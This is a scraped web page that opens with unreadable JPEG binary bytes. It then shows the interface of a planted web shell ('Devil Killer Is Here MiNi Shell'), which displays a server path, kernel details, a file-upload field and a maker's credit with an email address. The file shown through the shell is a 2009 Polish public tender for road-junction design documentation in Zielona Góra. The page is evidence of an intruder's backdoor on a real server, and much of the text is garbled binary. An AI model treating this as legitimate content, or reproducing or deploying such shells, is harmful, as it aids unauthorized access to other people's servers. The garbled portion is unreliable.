JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090603/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090603/178152-N-2009.html

<p class="kh_header"><b>Zielona Góra: Wykonanie dokumentacji projektowej rozbudowy skrzyżowania dróg wojewódzkich nr 131 i 132</b><br>
<b>Numer ogłoszenia: 178152 - 2009; data zamieszczenia: 03.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Zielonej Górze , Al. Niepodległości 32, 65-042 Zielona Góra, woj. lubuskie, tel. 068 3280300, faks 068 3280332.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej rozbudowy skrzyżowania dróg wojewódzkich nr 131 i 132.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Temat: Wykonanie dokumentacji projektowej rozbudowy skrzyżowania dróg wojewódzkich nr 131 i 132

I. Zakres prac projektowych:

-Przeprowadzenie analizy ruchowej na istniejącym skrzyżowaniu wraz z koncepcyjnym przyjęciem rozwiązań technicznych
-Przeprowadzenie konsultacji społecznych z miejscową ludnością, organizacjami ekologicznymi, społecznymi w celu uzyskania ich opinii;
-Sporządzenie raportów oddziaływania na środowisko (zarówno na etapie uzyskiwania decyzji  o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia jak i na etapie przeprowadzenia powtórnej oceny oddziaływania na środowisko podczas uzyskiwania zezwolenia na realizację inwestycji drogowej) - wraz ze stosownymi postanowieniami i uzgodnieniami, oraz z dokumentacją techniczną zabezpieczeń;
-Uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia;
-Inwentaryzacja urządzeń drogowych;
-Inwentaryzacja istniejącej infrastruktury technicznej oraz ewentualna jej przebudowa;
-Zapewnienie powierzchniowego odwodnienia jezdni (m.in. profilowanie oraz przebudowa istniejących rowów przydrożnych);
-Badania geotechniczne oraz rozpoznanie stanu istniejącej nawierzchni, opracowane prognozy ruchu wraz z przyjęciem konstrukcji - zgodnie z Katalogiem wzmocnień i remontów nawierzchni podatnych i półsztywnych;
-Wycinka drzew wraz z szacunkiem brakarskim - jeżeli zajdzie taka konieczność;
-Dokumentacja geodezyjna dotycząca podziałów działek (konieczna do przeniesienia prawa własności) - orientacyjna ilość działek - 5 szt., jeżeli zajdzie taka konieczność;
- rozliczenie kosztów podziału nastąpi na podstawie rzeczywistej ilości działek objętych podziałem, jako iloczyn faktycznej liczby działek objętych podziałem i ceny jednostkowej za podział jednej działki.


II.	 Dokumentacja techniczna powinna zawierać:

-Mapę do celów projektowych jako materiał wyjściowy do projektowania;
-Mapy władania gruntami i wypisy z rejestru gruntów z zaznaczonym zakresem koniecznych wejść w grunty obce;
-Dokumentację geodezyjną dotyczącą podziałów działek (konieczną do przeniesienia prawa własności);
-Dokumentację geologiczno - inżynierską, rozpoznanie stanu istn. nawierzchni w obrębie przebudowywanego skrzyżowania;
-Materiały do uzyskania opinii, uzgodnień i pozwoleń wymaganych przepisami szczególnymi;
-Raporty oddziaływania na środowisko (zarówno na etapie uzyskiwania decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia jak i na etapie przeprowadzenia powtórnej oceny oddziaływania na środowisko podczas uzyskiwania zezwolenia na realizację inwestycji drogowej) - wraz ze stosownymi  postanowieniami i uzgodnieniami oraz dokumentacją techniczną zabezpieczeń z niego wynikających;
-Dokumentacje na wycinkę drzew wraz z szacunkiem brakarskim - jeżeli zajdzie taka konieczność;
-Projekty  budowlane;
-Projekty  wykonawcze wszystkich branż;
-Opracowanie prognozy ruchu wraz z przyjęciem konstrukcji jezdni zgodnie 
z Katalogiem typowych konstrukcji nawierzchni podatnych i półsztywnych jako element składowy projektu wykonawczego;
-Projekt docelowej organizacji ruchu wraz z decyzją zatwierdzającą przez organ właściwy do zarządzania ruchem drogowym jako element składowy projektu wykonawczego;
-Szczegółowe Specyfikacje Techniczne jako element składowy projektu wykonawczego; 
-Kosztorys inwestorski wraz z przedmiarem robót jako element składowy projektu wykonawczego; 
-Zezwolenie na realizację inwestycji drogowej na wszystkie obiekty;

Szczegółowy zakres zamówienia znajduje się w Rozdziale III Instrukcji dla wykonawców - Opis przedmiotu zamówienia.

Zamawiający  przewiduje zamówienia  uzupełniające, o których  mowa w art. 67 ust.1 pkt 6 ustawy  Prawo zamówień publicznych stanowiących nie więcej niż 20% zamówienia podstawowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki określone w art.22 ust.1w następujący sposób :

A.	posiadają  uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
B. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wy?konania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;

- Wykażą wykonane, a w przypadku świadczeń okresowych lub ciągłych również wykonywane, usługi w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające* swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie;

*   przez usługi odpowiadające  swoim rodzajem i wartością usługom  stanowiącym przedmiot zamówienia  należy rozumieć opracowanie  min. jednej dokumentacji technicznej przebudowy lub budowy drogi kategorii wojewódzkiej lub krajowej klasy Z  i wyższej o dł. min. 1,00 km.

   
- wykażą, że dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia, tj., wskażą min. jednego: 
     - projektanta branży drogowej -posiadającego  uprawnienia w specjalności drogowej lub uprawnienia  bez ograniczeń w specjalności konstrukcyjno-budowlanej, zgodnie z art. 12 ust. 1 i 2 i art. 14 ust. 1  Prawa budowlanego, aktualne ubezpieczenie o.c. - przynależność do Izby Inżynierów Budownictwa  

Projektant branży drogowej musi posiadać w swoim doświadczeniu zawodowym zrealizowany min. 1 projekt przebudowy lub budowy drogi kategorii wojewódzkiej lub krajowej klasy Z  i wyższej o dł. min. 1,0 km - jako projektant wiodący;

Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza,  zobowiązuje się do uaktualniania ubezpieczenia OC - przynależność do Izby Inżynierów Budownictwa dla projektanta przez cały okres realizacji zamówienia.


-  wykażą że dysponują lub będą dysponować sprzętem komputerowym oraz oprogramowaniem (z licencją) niezbędnymi do realizacji zamówienia (min. 1 stanowisko)

  C.   znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia;
                   
- przedłożą polisę, a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości ubezpieczenia na kwotę nie mniejszą niż  135.000,00 zł.

W przypadku ofert składanych wspólnie, wszyscy partnerzy musza spełniać warunek sytuacji ekonomiczno-finansowej, tj. przedłożyć polisę lub inny dokument ubezpieczenia o.c. Dopuszcza się sumowanie wartości polis poszczególnych uczestników składających ofertę celem uzyskania wartości nie mniejszej niż  135.000,00 zł.

  D.  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 

  E.  udzielą 5-letniej gwarancji na wykonane prace projektowe

  F.  zakres robót drogowych wykonają we własnym zakresie, bez możliwości podzlecania.


Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy 
z postępowania


Dokonanie oceny spełniania warunków odbywać się będzie na podstawie przedłożonych przez wykonawcę dokumentów wyszczególnionych w pkt. 6 SIWZ na zasadzie: spełnia-nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Celem potwierdzenia że wykonawca posiada uprawnienia  do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp zamawiający żąda   następujące  dokumenty w formie oryginału lub kserokopii   poświadczonej  przez wykonawcę  za zgodność z oryginałem:

1/ Aktualnego odpisu z właściwego rejestru albo aktualne  zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert lub potwierdzony przez organ wydający w danym terminie;

1.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentu, o których mowa w pkt.1 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
A)  nie otwarto jego likwidacji ani nie ogłoszono upadłości:
B) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;.
 
2. Dokumenty, o których mowa w ust .j.w. AB  powinny być wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
 
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt  1zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Ważność dokumentów zgodnie z opisem j.w.

Celem potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wy?konania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia zamawiający żąda   następujących  dokumentów :


2/ Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających* swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie; (zał. nr 2)

*   przez usługi odpowiadające  swoim rodzajem i wartością usługom  stanowiącym przedmiot zamówienia  należy rozumieć opracowanie  min. jednej dokumentacji technicznej przebudowy lub budowy drogi kategorii wojewódzkiej lub krajowej klasy Z  i wyższej o dł. min. 1,00 km.





3/ Wykazu osób, którymi dysponuje lub będzie dysponować Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności 
(zał. nr 3 i 3a);
Wypełnić druk WYKAZ PERSONELU  z podaniem :
- projektanta branży drogowej,

4/ Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 3, wykonawca wskazał osoby, którymi będzie dysponował,

 5/ Dokumentów stwierdzających że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają  wymagane uprawnienia , jeśli ustawy nakładają obowiązek posiadania takich uprawnień 
- uprawnienia dla projektanta
- ubezpieczenie o.c, przynależność do Izby Inżynierów Budownictwa.

Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza,  zobowiązuje się do uaktualniania ubezpieczenia OC - przynależność do Izby Inżynierów Budownictwa dla projektanta przez cały okres realizacji zamówienia.

6/ Wykaz sprzętu komputerowego (zał. nr 6)
7/ Pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie o którym mowa w pkt. 6, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.

   W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda  następujących dokumentów:

8/ polisy, a w przypadku jej braku innego dokumentu ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości ubezpieczenia na kwotę nie mniejszą niż  135. 000,00 zł .

Celem potwierdzenia, że wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia 

9/ Oświadczenie o spełnieniu warunków określonych przepisami art. 22ust.1  ustawy  Prawo  zamówień publicznych (zał. nr 1 ).

Oferta oprócz w/w dokumentów ma  zawierać:
10/  Formularz oferty (Rozdział II);
Wypełnić druk Formularz oferty. Ofertę należy sporządzić ściśle wg wzoru druku załączonego  przez zamawiającego;

11/ Zobowiązanie do współpracy (zał. nr 4)

12/ Wykaz prac, które wykonawca powierzy podwykonawcom (zał. nr 5);

13/ Wypełniony formularz cenowy (Rozdział IV);
Wypełnić   kosztorys ofertowy / formularz cenowy. Kosztorys ofertowy sporządzić  ściśle wg wzoru druku załączonego  przez zamawiającego. Sporządzenie kosztorysu w innej formie spowoduje odrzucenie oferty.

Ofertę należy sporządzić ściśle wg wzoru druków załączonych przez zamawiającego.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zdw.zgora.pl (bezpłatnie).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego-zapłata w kasie 25 zł, lub po jej uprzedniej wpłacie na konto zamawiającego nr 71 1090 1535 0000 0001 0620 5700.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2009 godzina 12:00, miejsce: siedziba zamawiającego, pokój nr 5.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com